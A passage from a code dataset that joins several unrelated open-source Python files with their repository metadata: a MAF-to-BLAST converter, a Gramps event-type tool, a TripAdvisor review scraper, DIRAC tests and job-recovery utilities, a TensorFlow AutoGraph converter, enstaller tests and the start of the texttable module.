qstop = a.forward_strand_end
sstart = b.forward_strand_start
sstop = b.forward_strand_end
score = rec.score
evalue = blastz_score_to_ncbi_expectation(score)
score = blastz_score_to_ncbi_bits(score)
evalue, score = "{0:.2g}".format(evalue), "{0:.1f}".format(score)
hitlen = len(a.text)
pctid, nmismatch, ngaps = alignment_details(a.text, b.text)
print("\t".join(str(x) for x in (query, subject, pctid, hitlen,
nmismatch, ngaps, qstart, qstop, sstart, sstop,
evalue, score)))
def blast(args):
'''
%prog blast maffiles > out.blast
From a folder of .maf files, generate .blast file with tabular format.
'''
p = OptionParser(blast.__doc__)
opts, args = p.parse_args(args)
if len(args) == 0:
sys.exit(p.print_help())
flist = args
for f in flist:
maf_to_blast8(f)
if __name__ == '__main__':
main()
|
orionzhou/robin
|
formats/maf.py
|
Python
|
gpl-2.0
| 3,492
|
[
"BLAST"
] |
c6f73b2eeaad011e7e2d8297b910bc703d4ea1538f4db47f367ce135c69a59ca
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2006 Donald N. Allingham
# Copyright (C) 2008 Brian G. Matherly
# Copyright (C) 2010 Jakim Friant
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
"""Database Processing/Rename Event Types"""
#------------------------------------------------------------------------
#
# standard python modules
#
#------------------------------------------------------------------------
from gramps.gen.ggettext import gettext as _
from gramps.gen.ggettext import ngettext
#------------------------------------------------------------------------
#
# GRAMPS modules
#
#------------------------------------------------------------------------
from gramps.gui.utils import ProgressMeter
import locale
from gramps.gui.managedwindow import ManagedWindow
from gramps.gui.autocomp import fill_combo
from gramps.gen.lib import EventType
from gramps.gen.db import DbTxn
from gramps.gui.dialog import OkDialog
from gramps.gui.plug import tool
from gramps.gui.glade import Glade
#-------------------------------------------------------------------------
#
# ChangeTypes class
#
#-------------------------------------------------------------------------
class ChangeTypes(tool.BatchTool, ManagedWindow):
def __init__(self, dbstate, uistate, options_class, name, callback=None):
tool.BatchTool.__init__(self, dbstate, options_class, name)
if self.fail:
return
if uistate:
self.title = _('Change Event Types')
ManagedWindow.__init__(self,uistate,[],
self.__class__)
self.init_gui()
else:
self.run_tool(cli=True)
def init_gui(self):
# Draw dialog and make it handle everything
self.glade = Glade()
self.auto1 = self.glade.get_object("original")
self.auto2 = self.glade.get_object("new")
# Need to display localized event names
etype = EventType()
event_names = sorted(etype.get_standard_names(), key=locale.strxfrm)
fill_combo(self.auto1,event_names)
fill_combo(self.auto2,event_names)
etype.set_from_xml_str(self.options.handler.options_dict['fromtype'])
self.auto1.get_child().set_text(str(etype))
etype.set_from_xml_str(self.options.handler.options_dict['totype'])
self.auto2.get_child().set_text(str(etype))
window = self.glade.toplevel
self.set_window(window,self.glade.get_object('title'),self.title)
self.glade.connect_signals({
"on_close_clicked" : self.close,
"on_apply_clicked" : self.on_apply_clicked,
"on_delete_event" : self.close,
})
self.show()
def build_menu_names(self, obj):
return (self.title,None)
def run_tool(self,cli=False):
# Run tool and return results
# These are English names, no conversion needed
fromtype = self.options.handler.options_dict['fromtype']
totype = self.options.handler.options_dict['totype']
modified = 0
with DbTxn(_('Change types'), self.db, batch=True) as self.trans:
self.db.disable_signals()
if not cli:
progress = ProgressMeter(_('Analyzing Events'),'')
progress.set_pass('',self.db.get_number_of_events())
for event_handle in self.db.get_event_handles():
event = self.db.get_event_from_handle(event_handle)
if event.get_type().xml_str() == fromtype:
event.type.set_from_xml_str(totype)
modified += 1
self.db.commit_event(event,self.trans)
if not cli:
progress.step()
if not cli:
progress.close()
self.db.enable_signals()
self.db.request_rebuild()
if modified == 0:
msg = _("No event record was modified.")
else:
msg = ngettext("%d event record was modified."
, "%d event records were modified.", modified) % modified
if cli:
print "Done: ", msg
return (bool(modified),msg)
def on_apply_clicked(self, obj):
# Need to store English names for later comparison
the_type = EventType()
the_type.set(self.auto1.get_child().get_text())
self.options.handler.options_dict['fromtype'] = the_type.xml_str()
the_type.set(self.auto2.get_child().get_text())
self.options.handler.options_dict['totype'] = the_type.xml_str()
modified,msg = self.run_tool(cli=False)
OkDialog(_('Change types'), msg, self.window)
# Save options
self.options.handler.save_options()
self.close()
#------------------------------------------------------------------------
#
#
#
#------------------------------------------------------------------------
class ChangeTypesOptions(tool.ToolOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name,person_id=None):
tool.ToolOptions.__init__(self, name,person_id)
# Options specific for this report
self.options_dict = {
'fromtype' : '',
'totype' : '',
}
self.options_help = {
'fromtype' : ("=str","Type of events to replace",
"Event type string"),
'totype' : ("=str","New type replacing the old one",
"Event type string"),
}
|
arunkgupta/gramps
|
gramps/plugins/tool/changetypes.py
|
Python
|
gpl-2.0
| 6,334
|
[
"Brian"
] |
7b5a70fa6f5a3c995f77daca2658ba5518097ed3898ef0a79aa446be6c27983e
|
#!/usr/bin/env python
"""
Created on 2015-09-27T16:51:39
"""
from __future__ import division, print_function
import sys
import argparse
import re
import time
try:
import numpy as np
except ImportError:
print('You need numpy installed')
sys.exit(1)
import pandas as pd
from splinter.browser import Browser
import connect_aws_db as cadb
__author__ = "Matt Giguere (github: @mattgiguere)"
__license__ = "MIT"
__version__ = '0.0.1'
__maintainer__ = "Matt Giguere"
__email__ = "matthew.giguere@yale.edu"
__status__ = " Development NOT(Prototype or Production)"
# change default encoding to handle utf characters
reload(sys)
sys.setdefaultencoding('utf8')
def get_hotel_urls(city, state, engine):
"""Retrieve the hotels for the given city and state"""
# manipulate the city string into the proper form
citystr = (' ').join(city.lower().split('_'))
cmd = "SELECT hotel_id, business_id, hotel_url FROM ta_hotels WHERE "
cmd += "hotel_city='"+citystr+"' AND "
cmd += "hotel_state='"+state.lower()+"'"
result = engine.execute(cmd)
return [(row['hotel_id'], row['business_id'], row['hotel_url']) for row in result]
def return_results(url, page, br):
br.visit(url)
sleep_amount = np.random.uniform(8, 20)
print('sleeping for {} seconds before continuing.'.format(sleep_amount))
time.sleep(sleep_amount)
full_reviews = br.find_by_xpath('//div[contains(@class, "reviewSelector")]')
page_usernames = []
page_memberids = []
page_locations = []
page_titles = []
page_ratings = []
page_dates = []
page_reviews = []
page_review_ids = []
for fullrev in full_reviews:
# user name:
try:
member_info = fullrev.find_by_xpath('div/div[contains(@class, "col1of2")]/div[contains(@class, "member_info")]')
member_str = member_info.find_by_xpath('div[contains(@class, "memberOverlayLink")]')['id']
member_id = re.findall('UID_(.*)-', member_str)[0]
usrnm = member_info.find_by_xpath('div/div[contains(@class, "username mo")]')
except:
print('member_info does not exist')
member_id = ''
usrnm = ''
review = fullrev.find_by_xpath('div/div[@class="col2of2"]/div[@class="innerBubble"]')[0]
title = review.find_by_xpath('div/div[contains(@class, "quote")]').text.strip()[1:-1]
rating = review.find_by_xpath('div/div[contains(@class, "rating")]/span/img')['alt'].split(' ')[0]
date = review.find_by_xpath('div/div[contains(@class, "rating")]/span[contains(@class, "ratingDate")]')['title']
rev = review.find_by_xpath('div/div[contains(@class, "entry")]').text.strip().replace("\n", "")
if len(usrnm) > 0:
susrnm = usrnm[0].text
username = susrnm.decode('utf-8', 'ignore').strip()
print('Username: {}'.format(username))
else:
username = ''
print('Username: A Trip Advisor Member')
locationel = member_info.find_by_xpath('div[contains(@class, "location")]')
if len(locationel) > 0:
location = str(locationel[0].text).strip()
print('Location: {}'.format(location))
else:
location = ''
print('Location: ')
#print('full review_id: {}'.format(fullrev['id']))
try:
rev_id = re.search('review_(\d+)$', fullrev['id']).group(1)
except AttributeError:
rev_id = ''
# print('review_id: {}'.format(rev_id))
# print('Title: {}'.format(title))
# print('Rating: {}'.format(rating))
# print('Date: {}'.format(date))
# print('Review:')
# print(rev)
# print('*'*50)
# remove 4-byte unicode text:
try:
highpoints = re.compile(u'[\U00010000-\U0010ffff]')
except re.error:
# UCS-2 build
highpoints = re.compile(u'[\uD800-\uDBFF][\uDC00-\uDFFF]')
username = highpoints.sub(u'', username)
title = highpoints.sub(u'', title)
rev = highpoints.sub(u'', rev)
page_usernames.append(username)
page_memberids.append(member_id)
page_locations.append(location)
page_titles.append(title)
page_ratings.append(rating)
page_dates.append(date)
page_reviews.append(rev)
page_review_ids.append(rev_id)
if len(br.find_by_xpath('//a[contains(@class, "next")]')) > 0:
url = br.find_by_xpath('//a[contains(@class, "next")]')['href']
more_reviews = True
page += 1
# print('url and page updated.')
else:
more_reviews = False
ret_dict = {'usrnms': page_usernames,
'mmbrids': page_memberids,
'locs': page_locations,
'ttls': page_titles,
'rtngs': page_ratings,
'dts': page_dates,
'rvws': page_reviews,
'revids': page_review_ids,
'url': url,
'more_reviews': more_reviews,
'page': page}
return ret_dict
def get_done_business_ids(city, engine):
cmd = 'select distinct r.business_id from '
cmd += 'ta_reviews r inner join ta_hotels h on r.business_id = '
cmd += 'h.business_id where h.hotel_city = "'
cmd += (' ').join(city.split('_'))+'" '
donebids = [int(bid[0]) for bid in pd.read_sql_query(cmd, engine).values]
return donebids
def get_biz_review_ids(city, engine):
cmd = 'select biz_review_id from ta_reviews r inner join '
cmd += 'ta_hotels h on r.business_id=h.business_id '
cmd += 'where h.hotel_city = '
cmd += '"'+(' ').join(city.split('_'))+'"'
try:
xstng_revs = [int(rev_id[0]) for rev_id in pd.read_sql_query(cmd, engine).values]
except:
engine = cadb.connect_aws_db(write_unicode=True)
xstng_revs = [int(rev_id[0]) for rev_id in pd.read_sql_query(cmd, engine).values]
return xstng_revs
def remove_duplicates(bigdf, city, engine):
xstng_revs = get_biz_review_ids(city, engine)
if len(xstng_revs) > 0:
bigdf = bigdf[~bigdf['biz_review_id'].isin(xstng_revs)].copy()
return bigdf
def scrape_hotel(url, br, engine):
columns = ['review_id',
'hotel_id',
'business_id',
'biz_review_id',
'biz_member_id',
'username',
'review_title',
'review_rating',
'review_text',
'review_date']
bigdf = pd.DataFrame(columns=columns)
more_reviews = True
page = 1
while more_reviews:
print('*'*50)
print('Now on page {}'.format(page))
#print('*'*50)
df = pd.DataFrame(columns=columns)
ret_dict = return_results(url, page, br)
#print(ret_dict['locs'])
#print(ret_dict['ttls'])
df['biz_review_id'] = ret_dict['revids']
df['biz_member_id'] = ret_dict['mmbrids']
df['username'] = ret_dict['usrnms']
df['review_title'] = ret_dict['ttls']
df['review_rating'] = ret_dict['rtngs']
df['review_date'] = ret_dict['dts']
df['review_text'] = ret_dict['rvws']
url = ret_dict['url']
more_reviews = ret_dict['more_reviews']
page = ret_dict['page']
print('successfully completed page {}'.format(page))
bigdf = bigdf.append(df)
# more_reviews = False
return bigdf
def splinter_scrape_ta_reviews(city='', state='', write_to_db=False, start_num=0, end_num=-1):
"""PURPOSE: To """
engine = cadb.connect_aws_db(write_unicode=True)
blinks = get_hotel_urls(city, state, engine)
# only do the specified hotel range
if start_num != 0:
blinks = blinks[start_num:]
if end_num != -1:
if len(blinks) < end_num:
print('end_num exceeded number of hotels. resetting to max.')
end_num = len(blinks)
blinks = blinks[:end_num]
br = Browser()
donebids = get_done_business_ids(city, engine)
for hotel_id, biz_id, link in blinks:
# check to see if there are already reviews for that hotel
if int(biz_id) not in donebids:
bigdf = scrape_hotel(link, br, engine)
bigdf['hotel_id'] = hotel_id
bigdf['business_id'] = biz_id
bigdf['biz_review_id'] = np.int64(bigdf['biz_review_id'].values)
bigdf = remove_duplicates(bigdf, city, engine)
if write_to_db:
try:
bigdf.to_sql('ta_reviews', engine, if_exists='append', index=False)
except:
print('WRITING TO DB FAILED!!!')
else:
print('business_id {} already scraped.'.format(biz_id))
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='argparse object.')
parser.add_argument(
'--city_url',
help='The url of the city to scrape.',
nargs='?', default='')
parser.add_argument(
'-c', '--city',
help='The url of the city to scrape.',
nargs='?', default='')
parser.add_argument(
'-s', '--state',
help='This name of the state to scrape.',
nargs='?', default='')
parser.add_argument(
'--start_num',
help='The starting number within the list of hotels for a city ' +
'to start with. For example, if there are ten hotels for the city, ' +
'and you only want to add reviews for hotels 5 through 10, set ' +
'start_num to 5.',
nargs='?', default=0)
parser.add_argument(
'--end_num',
help='The ending number within the list of hotels for a city. ' +
'For example, if there are ten hotels for the city, ' +
'and you only want to add reviews for hotels 0 through 4, set ' +
'end_num to 5.',
nargs='?', default=-1)
parser.add_argument(
'-w', '--write_to_db',
help='Set if you want to write the results to the DB.',
default=False, action='store_true')
if len(sys.argv) > 11:
print('use the command')
print('python splinter_scrape_bf.py city state')
print('For example:')
print('python splinter_scrape_ta_reviews.py -c new_haven -s ct')
sys.exit(2)
args = parser.parse_args()
splinter_scrape_ta_reviews(city=args.city,
state=args.state,
write_to_db=args.write_to_db,
start_num=int(args.start_num),
end_num=int(args.end_num))
|
mattgiguere/doglodge
|
code/splinter_scrape_ta_reviews.py
|
Python
|
mit
| 10,631
|
[
"VisIt"
] |
d3a28c7b1d77da51a192063e17386b0f0467c28fbf203a8c6ecd95b53c3e06a0
|
########################################################################
# Author: Krzysztof.Ciba@NOSPAMgmail.com
# Date: 2011/01/17 08:17:58
########################################################################
""".. module:: ListTestCase
Test cases for DIRAC.Core.Utilities.List module.
"""
import unittest
# sut
from DIRAC.Core.Utilities import List
########################################################################
class ListTestCase(unittest.TestCase):
"""py:class ListTestCase
Test case for DIRAC.Core.Utilities.List module.
"""
def testUniqueElements(self):
"""uniqueElements tests"""
# empty list
aList = []
self.assertEqual(List.uniqueElements(aList), [])
# redundant elements
aList = [1, 1, 2, 3]
self.assertEqual(List.uniqueElements(aList), [1, 2, 3])
def testAppendUnique(self):
"""appendUnique tests"""
# empty
aList = []
List.appendUnique(aList, None)
self.assertEqual(aList, [None])
# redundant element
aList = [1, 2, 3]
List.appendUnique(aList, 1)
self.assertEqual(aList, [1, 2, 3])
# all unique
aList = [1, 2]
List.appendUnique(aList, 3)
self.assertEqual(aList, [1, 2, 3])
def testRandomize(self):
"""randomize tests"""
# empty list
aList = []
randList = List.randomize(aList)
self.assertEqual(randList, [])
# non empty
aList = ["1", "2", "3"]
randList = List.randomize(aList)
self.assertEqual(len(aList), len(randList))
for x in aList:
self.assertEqual(x in randList, True)
for x in randList:
self.assertEqual(x in aList, True)
def testPop(self):
"""pop tests"""
# empty list
aList = []
x = List.pop(aList, 1)
self.assertEqual(aList, [])
self.assertEqual(x, None)
# pop
aList = [1, 2, 3]
x = List.pop(aList, 2)
self.assertEqual(x, 2)
self.assertEqual(aList, [1, 3])
def testStringListToString(self):
"""stringListToString tests"""
# empty list
aList = []
aStr = List.stringListToString(aList)
self.assertEqual(aStr, "")
# not string elements (should it raise an exception???)
aList = ["a", 1]
aStr = List.stringListToString(aList)
self.assertEqual(aStr, "'a','1'")
# normal list
aList = ["a", "b", "c"]
aStr = List.stringListToString(aList)
self.assertEqual(aStr, "'a','b','c'")
def testIntListToString(self):
"""intListToString"""
# empty list
aList = []
aStr = List.intListToString(aList)
self.assertEqual(aStr, "")
# int list
aList = [1, 2, 3]
aStr = List.intListToString(aList)
self.assertEqual(aStr, "1,2,3")
# mixture elements (should it raise an exception???)
aList = ["1", 2, 3]
aStr = List.intListToString(aList)
self.assertEqual(aStr, "1,2,3")
def testFromChar(self):
"""fromChar tests"""
# empty string
aStr = ""
self.assertEqual(List.fromChar(aStr, "-"), [])
# wrong sep (should it raise an exception???)
aStr = "a:b:c"
self.assertEqual(List.fromChar(aStr, "-"), ["a:b:c"])
# norman behavior
aStr = "a:b:c"
self.assertEqual(List.fromChar(aStr, ":"), ["a", "b", "c"])
# only sep
aStr = ","
self.assertEqual(List.fromChar(aStr, ","), [])
# too many separators
aStr = "a,,b,,c,,,"
self.assertEqual(List.fromChar(aStr, ","), ["a", "b", "c"])
def testBreakListIntoChunks(self):
"""breakListIntoChunks tests"""
# empty list
aList = []
self.assertEqual(List.breakListIntoChunks(aList, 5), [])
# negative number of chunks
try:
List.breakListIntoChunks([], -2)
except Exception as val:
self.assertEqual(isinstance(val, RuntimeError), True)
self.assertEqual(str(val), "chunkSize cannot be less than 1")
# normal behavior
aList = list(range(10))
self.assertEqual(List.breakListIntoChunks(aList, 5), [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]])
# and once again this time with a rest
aList = list(range(10))
self.assertEqual(List.breakListIntoChunks(aList, 4), [[0, 1, 2, 3], [4, 5, 6, 7], [8, 9]])
# almost empty list, too many chunks
aList = [1]
self.assertEqual(List.breakListIntoChunks(aList, 2), [[1]])
# test suite execution
if __name__ == "__main__":
TESTLOADER = unittest.TestLoader()
SUITE = TESTLOADER.loadTestsFromTestCase(ListTestCase)
unittest.TextTestRunner(verbosity=3).run(SUITE)
|
DIRACGrid/DIRAC
|
src/DIRAC/Core/Utilities/test/Test_List.py
|
Python
|
gpl-3.0
| 4,847
|
[
"DIRAC"
] |
59953cce689b15ea51f1970d0f08cb9f0bdfe13313321a458bc2659a383de6a2
|
"""TransformationInfo class to be used by ILCTransformation System"""
from collections import OrderedDict, defaultdict
from itertools import izip_longest
from DIRAC import gLogger, S_OK
from DIRAC.Core.Utilities.List import breakListIntoChunks
from DIRAC.Core.Utilities.Proxy import UserProxy
from DIRAC.DataManagementSystem.Client.DataManager import DataManager
from DIRAC.TransformationSystem.Utilities.JobInfo import JobInfo
from DIRAC.WorkloadManagementSystem.Client.JobStateUpdateClient import JobStateUpdateClient
__RCSID__ = "$Id$"
class TransformationInfo(object):
"""Hold information about a transformation."""
def __init__(self, transformationID, transInfoDict, enabled,
tClient, fcClient, jobMon):
"""Store clients etc."""
self.log = gLogger.getSubLogger(__name__ + "[%s]" % transformationID)
self.enabled = enabled
self.tID = transformationID
self.transName = transInfoDict['TransformationName']
self.tClient = tClient
self.jobMon = jobMon
self.fcClient = fcClient
self.transType = transInfoDict['Type']
self.authorDN = transInfoDict['AuthorDN']
self.authorGroup = transInfoDict['AuthorGroup']
self.jobStateClient = JobStateUpdateClient()
def checkTasksStatus(self):
"""Check the status for the task of given transformation and taskID"""
res = self.tClient.getTransformationFiles(condDict={'TransformationID': self.tID})
if not res['OK']:
raise RuntimeError("Failed to get transformation tasks: %s" % res['Message'])
tasksDict = defaultdict(list)
for task in res['Value']:
taskID = task['TaskID']
lfn = task['LFN']
status = task['Status']
fileID = task['FileID']
errorCount = task['ErrorCount']
tasksDict[taskID].append(dict(FileID=fileID, LFN=lfn, Status=status, ErrorCount=errorCount))
return tasksDict
def setJobDone(self, job):
""" set the taskID to Done"""
if not self.enabled:
return
self.__setTaskStatus(job, 'Done')
if job.status != 'Done':
self.__updateJobStatus(job.jobID, 'Done', "Job forced to Done")
def setJobFailed(self, job):
""" set the taskID to Done"""
if not self.enabled:
return
self.__setTaskStatus(job, 'Failed')
if job.status != 'Failed':
self.__updateJobStatus(job.jobID, "Failed", "Job forced to Failed")
def setInputUnused(self, job):
"""Set the inputfiles to unused"""
self.__setInputStatus(job, 'Unused')
def setInputMaxReset(self, job):
"""set the inputfile to MaxReset"""
self.__setInputStatus(job, "MaxReset")
def setInputProcessed(self, job):
"""set the inputfile to processed"""
self.__setInputStatus(job, "Processed")
def setInputDeleted(self, job):
"""set the inputfile to processed"""
self.__setInputStatus(job, "Deleted")
def __setInputStatus(self, job, status):
"""set the input file to status"""
if self.enabled:
result = self.tClient.setFileStatusForTransformation(self.tID, status, job.inputFiles, force=True)
if not result['OK']:
gLogger.error("Failed updating status", result['Message'])
raise RuntimeError("Failed updating file status")
def __setTaskStatus(self, job, status):
"""update the task in the TransformationDB"""
taskID = job.taskID
res = self.tClient.setTaskStatus(self.transName, taskID, status)
if not res['OK']:
raise RuntimeError("Failed updating task status: %s" % res['Message'])
def __updateJobStatus(self, jobID, status, minorstatus=''):
"""Update the job status."""
if self.enabled:
source = 'DataRecoveryAgent'
result = self.jobStateClient.setJobStatus(jobID, status, minorstatus, source)
else:
return S_OK('DisabledMode')
if not result['OK']:
self.log.error('Failed to update job status', result['Message'])
raise RuntimeError('Failed to update job status')
return result
def __findAllDescendants(self, lfnList):
"""Find all descendants of a list of LFNs"""
allDescendants = []
result = self.fcClient.getFileDescendents(lfnList, range(1, 8))
if not result['OK']:
return allDescendants
for dummy_lfn, descendants in result['Value']['Successful'].items():
allDescendants.extend(descendants)
return allDescendants
def cleanOutputs(self, jobInfo):
"""Remove all job outputs for job represented by jobInfo object.
Including removal of descendents, if defined.
"""
if len(jobInfo.outputFiles) == 0:
return
descendants = self.__findAllDescendants(jobInfo.outputFiles)
existingOutputFiles = [
lfn for lfn,
status in izip_longest(
jobInfo.outputFiles,
jobInfo.outputFileStatus) if status == "Exists"]
filesToDelete = existingOutputFiles + descendants
if not filesToDelete:
return
if not self.enabled:
self.log.notice("Would have removed these files: \n +++ %s " % "\n +++ ".join(filesToDelete))
return
self.log.notice("Remove these files: \n +++ %s " % "\n +++ ".join(filesToDelete))
errorReasons = defaultdict(list)
successfullyRemoved = 0
for lfnList in breakListIntoChunks(filesToDelete, 200):
with UserProxy(proxyUserDN=self.authorDN, proxyUserGroup=self.authorGroup) as proxyResult:
if not proxyResult['OK']:
raise RuntimeError('Failed to get a proxy: %s' % proxyResult['Message'])
result = DataManager().removeFile(lfnList)
if not result['OK']:
self.log.error("Failed to remove LFNs", result['Message'])
raise RuntimeError("Failed to remove LFNs: %s" % result['Message'])
for lfn, err in result['Value']['Failed'].items():
reason = str(err)
errorReasons[reason].append(lfn)
successfullyRemoved += len(result['Value']['Successful'].keys())
for reason, lfns in errorReasons.items():
self.log.error("Failed to remove %d files with error: %s" % (len(lfns), reason))
self.log.notice("Successfully removed %d files" % successfullyRemoved)
def getJobs(self, statusList=None):
"""Get done and failed jobs.
:param list statusList: optional list of status to find jobs
:returns: 3-tuple of OrderedDict of JobInfo objects, keyed by jobID;
number of Done jobs; number of Failed jobs
"""
done = S_OK([])
failed = S_OK([])
if statusList is None:
statusList = ['Done', 'Failed']
if 'Done' in statusList:
self.log.notice("Getting 'Done' Jobs...")
done = self.__getJobs(["Done"])
if 'Failed' in statusList:
self.log.notice("Getting 'Failed' Jobs...")
failed = self.__getJobs(["Failed"])
done = done['Value']
failed = failed['Value']
jobsUnsorted = {}
for job in done:
jobsUnsorted[int(job)] = JobInfo(job, "Done", self.tID, self.transType)
for job in failed:
jobsUnsorted[int(job)] = JobInfo(job, "Failed", self.tID, self.transType)
jobs = OrderedDict(sorted(jobsUnsorted.items(), key=lambda t: t[0]))
self.log.notice("Found %d Done Jobs " % len(done))
self.log.notice("Found %d Failed Jobs " % len(failed))
return jobs, len(done), len(failed)
def __getJobs(self, status):
"""Return list of jobs with given status.
:param list status: list of status to find
:returns: S_OK with result
:raises: RuntimeError when failing to find jobs
"""
attrDict = dict(Status=status, JobGroup='%08d' % int(self.tID))
res = self.jobMon.getJobs(attrDict)
if res['OK']:
self.log.debug('Found Trans jobs: %s' % res['Value'])
return res
else:
self.log.error('Error finding jobs: ', res['Message'])
raise RuntimeError('Failed to get jobs')
|
fstagni/DIRAC
|
TransformationSystem/Utilities/TransformationInfo.py
|
Python
|
gpl-3.0
| 7,716
|
[
"DIRAC"
] |
f3156a26e389e31a96a02db72700bbd1113cbca0d4b528191692d6fb706eb597
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converter for logical expressions, e.g. `a and b -> tf.logical_and(a, b)`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.pyct import parser
from tensorflow.python.autograph.pyct import templates
# TODO(mdan): Properly extract boolean ops according to lazy eval rules.
# Note that this isn't completely safe either, because tensors may have control
# dependencies.
# Note that for loops that should be done after the loop was converted to
# tf.while_loop so that the expanded conditionals are properly scoped.
# Used to signal that an operand is safe for non-lazy evaluation.
SAFE_BOOLEAN_OPERAND = 'SAFE_BOOLEAN_OPERAND'
LOGICAL_OPERATORS = {
gast.And: 'ag__.and_',
gast.Not: 'ag__.not_',
gast.Or: 'ag__.or_',
}
EQUALITY_OPERATORS = {
gast.Eq: 'ag__.eq',
gast.NotEq: 'ag__.not_eq',
}
class LogicalExpressionTransformer(converter.Base):
"""Converts logical expressions to corresponding TF calls."""
def _overload_of(self, operator):
op_type = type(operator)
if op_type in LOGICAL_OPERATORS:
return LOGICAL_OPERATORS[op_type]
if self.ctx.program.options.uses(converter.Feature.EQUALITY_OPERATORS):
if op_type in EQUALITY_OPERATORS:
return EQUALITY_OPERATORS[op_type]
return None
def _as_lambda(self, expr):
return templates.replace_as_expression('lambda: expr', expr=expr)
def _as_binary_function(self, func_name, arg1, arg2):
return templates.replace_as_expression(
'func_name(arg1, arg2)',
func_name=parser.parse_expression(func_name),
arg1=arg1,
arg2=arg2)
def _as_binary_operation(self, op, arg1, arg2):
template = templates.replace_as_expression(
'arg1 is arg2',
arg1=arg1,
arg2=arg2)
template.ops[0] = op
return template
def _as_unary_function(self, func_name, arg):
return templates.replace_as_expression(
'func_name(arg)', func_name=parser.parse_expression(func_name), arg=arg)
def visit_Compare(self, node):
node = self.generic_visit(node)
if (not self.ctx.program.options.uses(
converter.Feature.EQUALITY_OPERATORS)):
return node
ops_and_comps = list(zip(node.ops, node.comparators))
left = node.left
# Repeated comparisons are converted to conjunctions:
# a < b < c -> a < b and b < c
op_tree = None
while ops_and_comps:
op, right = ops_and_comps.pop(0)
overload = self._overload_of(op)
if overload is not None:
binary_comparison = self._as_binary_function(overload, left, right)
else:
binary_comparison = self._as_binary_operation(op, left, right)
if op_tree is not None:
op_tree = self._as_binary_function('ag__.and_',
self._as_lambda(op_tree),
self._as_lambda(binary_comparison))
else:
op_tree = binary_comparison
left = right
assert op_tree is not None
return op_tree
def visit_UnaryOp(self, node):
node = self.generic_visit(node)
overload = self._overload_of(node.op)
if overload is None:
return node
return self._as_unary_function(overload, node.operand)
def visit_BoolOp(self, node):
node = self.generic_visit(node)
node_values = node.values
right = node.values.pop()
while node_values:
left = node_values.pop()
right = self._as_binary_function(
self._overload_of(node.op), self._as_lambda(left),
self._as_lambda(right))
return right
def transform(node, ctx):
transformer = LogicalExpressionTransformer(ctx)
return transformer.visit(node)
|
xzturn/tensorflow
|
tensorflow/python/autograph/converters/logical_expressions.py
|
Python
|
apache-2.0
| 4,499
|
[
"VisIt"
] |
3cbbc225bb693eba99268e0b99163d3b79b1f7407c86bb0e3cd8fdce7265d3c6
|
import random
import unittest
from egginst.main import name_version_fn
from enstaller.utils import canonical, cname_fn, comparable_version
class TestUtils(unittest.TestCase):
def test_canonical(self):
for name, cname in [
('NumPy', 'numpy'),
('MySql-python', 'mysql_python'),
('Python-dateutil', 'python_dateutil'),
]:
self.assertEqual(canonical(name), cname)
def test_cname_fn(self):
self.assertEqual(cname_fn('VTK-5.4.2-1.egg'), 'vtk')
def test_naming(self):
for fn, name, ver, cname in [
('NumPy-1.5-py2.6-win32.egg', 'NumPy', '1.5-py2.6-win32', 'numpy'),
('NumPy-1.5-2.egg', 'NumPy', '1.5-2', 'numpy'),
('NumPy-1.5.egg', 'NumPy', '1.5', 'numpy'),
]:
self.assertEqual(name_version_fn(fn), (name, ver))
self.assertEqual(cname_fn(fn), cname)
self.assertEqual(canonical(name), cname)
def test_comparable_version(self):
for versions in (
['1.0.4', '1.2.1', '1.3.0b1', '1.3.0', '1.3.10',
'1.3.11.dev7', '1.3.11.dev12', '1.3.11.dev111',
'1.3.11', '1.3.143',
'1.4.0.dev7749', '1.4.0rc1', '1.4.0rc2', '1.4.0'],
['2008j', '2008k', '2009b', '2009h', '2010b'],
['0.99', '1.0a2', '1.0b1', '1.0rc1', '1.0', '1.0.1'],
['2.0.8', '2.0.10', '2.0.10.1', '2.0.11'],
['0.10.1', '0.10.2', '0.11.dev1324', '0.11'],
):
org = list(versions)
random.shuffle(versions)
versions.sort(key=comparable_version)
self.assertEqual(versions, org)
if __name__ == '__main__':
unittest.main()
|
jwiggins/keyenst
|
tests/test_utils.py
|
Python
|
bsd-3-clause
| 1,722
|
[
"VTK"
] |
43095e5148a6fb1fc33bfd0f2cd4466333e255004621d3abafd2ca60cb088d28
|
#!/usr/bin/env python
#
# texttable - module for creating simple ASCII tables
# Copyright (C) 2003-2011 Gerome Fournier <jef(at)foutaise.org>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# NOTE: This is external code.
# We don't do automatic Eclipse PyDev code analysis for it.
#@PydevCodeAnalysisIgnore
"""module for creating simple ASCII tables
Example:
table = TextTable()
table.set_cols_align(["l", "r", "c"])
table.set_cols_valign(["t", "m", "b"])
table.add_rows([ ["Name", "Age", "Nickname"],
